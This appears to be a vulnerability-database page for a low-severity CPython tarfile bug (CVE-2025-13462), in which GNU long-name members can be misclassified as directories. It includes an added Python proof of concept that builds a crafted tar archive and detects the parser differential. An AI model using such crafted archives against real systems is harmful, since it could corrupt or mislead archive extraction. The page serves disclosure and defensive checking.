CVE-2025-13462: Improper Input Validation in Python Software Foundation CPython

Severity: 2.0 LOW (NVD)
EPSS: 0.0% (top 97.42%)
CISA KEV: Not in KEV
Exploit: No known exploits
Timeline: Published Mar 12

Description

The "tarfile" module applies the V7 normalization of AREGTYPE (\x00) entries whose name ends in "/" to DIRTYPE even while it is processing a multi-block member such as GNUTYPE_LONGNAME or GNUTYPE_LONGLINK, where the 100-byte name field of the header that follows the long-name data is superseded by the long name carried in the preceding data blocks. A crafted archive whose truncated 100-byte name ends in "/" but whose full name does not can therefore be classified by the tarfile module as a different entry type than other implementations (such as GNU tar) would produce, which is the data-integrity problem the vendor advisories describe.
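The parser differential described above, as an added example that is not part of the CVE record or of CPython's own code. The block builds a two-header GNU long-name member in memory (constructed sample input), parses it once with a minimal reference walker that resolves the long name before applying the V7 trailing-slash rule (an assumption about how other implementations behave, written here from the tar format, not taken from GNU tar's source), and once with this interpreter's tarfile module. The names LONG_NAME, CONTENT, build_crafted_tar, reference_parse, tarfile_parse and find_differentials are this example's own.

```python
import io
import tarfile

BLOCK = 512

# Constructed sample input (assumption): a path whose first 100 bytes end in
# "/" although the full path names a regular file.
LONG_NAME = b"a" * 99 + b"/payload.txt"   # 111 bytes; the 100-byte prefix ends in "/"
CONTENT = b"not a directory\n"            # 16 bytes of file data


def _nts(b: bytes) -> str:
    """NUL-terminated bytes -> str (the rule tarfile uses for header strings)."""
    p = b.find(b"\0")
    return (b if p < 0 else b[:p]).decode("utf-8", "surrogateescape")


def _header(name: bytes, size: int, typeflag: bytes) -> bytes:
    """Build one 512-byte GNU-format header with a valid checksum."""
    buf = bytearray(BLOCK)
    name = name[:100]
    buf[0:len(name)] = name
    buf[100:108] = b"0000644\0"          # mode
    buf[108:116] = b"0000000\0"          # uid
    buf[116:124] = b"0000000\0"          # gid
    buf[124:136] = b"%011o\0" % size     # size, octal
    buf[136:148] = b"%011o\0" % 0        # mtime
    buf[148:156] = b" " * 8              # checksum field counts as spaces
    buf[156:157] = typeflag
    buf[257:265] = b"ustar  \0"          # GNU magic + version
    buf[148:156] = b"%06o\0 " % sum(buf)
    return bytes(buf)


def _pad(b: bytes) -> bytes:
    """Pad data to a whole number of 512-byte blocks."""
    return b + b"\0" * (-len(b) % BLOCK)


def build_crafted_tar() -> bytes:
    """'L' (GNUTYPE_LONGNAME) header + long-name data, then the real header.

    The real header carries typeflag \\x00 (AREGTYPE) and only the truncated
    100-byte name, which ends in "/".  The authoritative name is in the
    preceding 'L' data and does not end in "/".
    """
    ln_data = LONG_NAME + b"\0"
    return (
        _header(b"././@LongLink", len(ln_data), b"L") + _pad(ln_data)
        + _header(LONG_NAME[:100], len(CONTENT), b"\0") + _pad(CONTENT)
        + b"\0" * (2 * BLOCK)            # end-of-archive marker
    )


def reference_parse(data: bytes) -> list:
    """Resolve 'L'/'K' long names first, then apply the V7 rule
    ("AREGTYPE whose name ends in /" is a directory) to the resolved name."""
    members, pending_name, pending_link, off = [], None, None, 0
    while off + BLOCK <= len(data):
        hdr = data[off:off + BLOCK]
        if hdr == b"\0" * BLOCK:
            break
        size = int(_nts(hdr[124:136]).strip() or "0", 8)
        typeflag = hdr[156:157]
        body = data[off + BLOCK:off + BLOCK + size]
        off += BLOCK + (size + BLOCK - 1) // BLOCK * BLOCK
        if typeflag == b"L":
            pending_name = _nts(body)
            continue
        if typeflag == b"K":
            pending_link = _nts(body)
            continue
        name = pending_name if pending_name is not None else _nts(hdr[0:100])
        link = pending_link if pending_link is not None else _nts(hdr[157:257])
        pending_name = pending_link = None
        if typeflag == b"\0" and name.endswith("/"):   # V7 rule, resolved name only
            typeflag = b"5"
        members.append({"name": name, "type": typeflag, "size": size, "linkname": link})
    return members


def _kind(typeflag: bytes) -> str:
    if typeflag == tarfile.DIRTYPE:
        return "directory"
    if typeflag in (tarfile.AREGTYPE, tarfile.REGTYPE):
        return "file"
    return "other"


def tarfile_parse(data: bytes) -> list:
    """What this interpreter's tarfile module believes the archive contains."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:") as tf:
        return [{"name": m.name, "type": m.type, "size": m.size} for m in tf.getmembers()]


def find_differentials(data: bytes) -> list:
    """(name, reference kind, tarfile kind) for members the two parsers classify
    differently; empty on a tarfile build that carries the fix."""
    ref = {m["name"]: _kind(m["type"]) for m in reference_parse(data)}
    mine = {m["name"]: _kind(m["type"]) for m in tarfile_parse(data)}
    return [(n, ref[n], mine.get(n, "missing")) for n in ref if ref[n] != mine.get(n, "missing")]


if __name__ == "__main__":
    data = build_crafted_tar()
    print("reference:", [(m["name"][-12:], _kind(m["type"])) for m in reference_parse(data)])
    print("tarfile  :", [(m["name"][-12:], _kind(m["type"])) for m in tarfile_parse(data)])
    print("differentials:", find_differentials(data))
```

On an affected interpreter find_differentials reports the member as a file for the reference walker and a directory for tarfile; a fixed build reports nothing. The same walker can be run over untrusted archives before extraction as a cheap cross-check of tarfile's member types.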

CVSS vector

CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N

Affected Packages (1 package)

CVEList V5: python_software_foundation/cpython, versions listed: 3.14.0, 3.14.4 (+2 more)

Vulnerability Details (3 sources)

CVEList: tarfile: Skip DIRTYPE normalization during GNU LONGNAME/LONGLINK handling (2026-03-12)
OSV: CVE-2025-13462: The "tarfile" module would still apply normalization of AREGTYPE (\x00) blocks to DIRTYPE, even while processing a multi-block member such as GNUTYPE_... (2026-03-12)
GHSA: GHSA-9qpv-486p-2v4h: The "tarfile" module would still apply normalization of AREGTYPE (\x00) blocks to DIRTYPE, even while processing a multi-block member such as GNUTYPE_... (2026-03-12)

Vendor Advisories (3 sources)

Red Hat: cpython: `tarfile` module misinterprets crafted tar archives leading to data integrity issues (2026-03-12)
Microsoft: tarfile: Skip DIRTYPE normalization during GNU LONGNAME/LONGLINK handling (2026-03-10)
Debian: CVE-2025-13462: python2.7 - The "tarfile" module would still apply normalization of AREGTYPE (\x00) blocks t... (2025)

Threat Intelligence (1 source)

Wiz: CVE-2025-13462 Impact, Exploitability, and Mitigation Steps | Wiz

Page: CVE-2025-13462, Improper Input Validation | cvebase